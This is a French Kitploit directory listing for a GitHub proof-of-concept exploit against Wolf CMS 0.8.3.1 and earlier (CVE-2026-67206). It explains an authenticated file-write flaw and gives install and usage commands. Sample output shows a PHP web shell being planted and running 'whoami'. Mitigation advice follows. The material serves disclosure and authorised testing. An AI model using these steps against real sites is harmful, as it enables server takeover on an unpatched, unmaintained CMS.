Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-67206 — Exploit PoC pour Wolf CMS <= 0.8.3.1 : s'authentifie auprès de l'Admin, écrit un fichier PHP arbitraire dans /public via FileManagerController et exécute des commandes via un web shell. | Kitploit
Outils/GitHubGitHub/anirbala98/cve-2026-67206
ExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubanirbala98/cve-2026-67206

CVE-2026-67206

Exploit PoC pour Wolf CMS <= 0.8.3.1 : s'authentifie auprès de l'Admin, écrit un fichier PHP arbitraire dans /public via FileManagerController et exécute des commandes via un web shell.

Voir le dépôt
13il y a 21 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - RCE via écriture arbitraire de fichiers

Ce dépôt contient une preuve de concept (PoC) pour l'exploitation de la CVE-2026-67206

Avertissement

Ce projet est fourni à des fins éducatives et pour des tests de sécurité autorisés uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.

Présentation

Une vulnérabilité d'écriture arbitraire de fichiers existe dans les versions de Wolf CMS jusqu'à la 0.8.3.1. Elle permet à un attaquant authentifié d'écrire des fichiers arbitraires malveillants dans le répertoire /public de la racine web via les fonctions create_file() et save() de FileManagerController.php. La fonction create_file() de FileManagerController.php ne valide pas les extensions de fichiers, permettant ainsi aux attaquants authentifiés d'écrire des scripts PHP malveillants et d'obtenir des privilèges d'exécution de code à distance.

Une analyse détaillée avec analyse du code source et démonstration de l'exploitation est disponible sur mon blog Medium.

Version affectée

Toutes les versions de Wolf CMS jusqu'à la 0.8.3.1 sont affectées. Le dépôt Wolf CMS a été archivé le 28 août 2021 et n'est plus activement maintenu. Aucun correctif n'existe actuellement pour cette vulnérabilité.

Prérequis

  • Python 3.13.14
  • Requests 2.32.5
  • Beautifulsoup4 4.15.0

Installation

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt

Utilisation

root@kitploit:~
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin

Exemple

root@kitploit:~
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K 
[*] Connexion avec les identifiants fournis...
[+] Connexion réussie

[*] Création d'un fichier nommé shell.php...
[+] Création du fichier réussie

[*] Tentative d'écriture de la charge utile dans shell.php...
[+] Charge utile écrite avec succès !
[+] Le shell web est accessible avec la chaîne de requête 'cmd' à l'adresse http://127.0.0.1:8080/public/shell.php
[+] Test de la sortie de http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data

Atténuation

  • Valider les extensions des fichiers créés par les utilisateurs authentifiés sur la base d'une liste blanche
  • Interdire les extensions comme .php, .phtml, .phar, .php5, etc., sauf si nécessaire
  • Interdire l'exécution de PHP dans les répertoires de téléversement de la racine du serveur web
  • Enregistrer les fichiers créés sur un serveur différent si possible pour minimiser l'impact

Références

  • https://www.tenable.com/cve/CVE-2026-67206
  • https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-67206-0ad3ae08bc78
Télécharger l’outil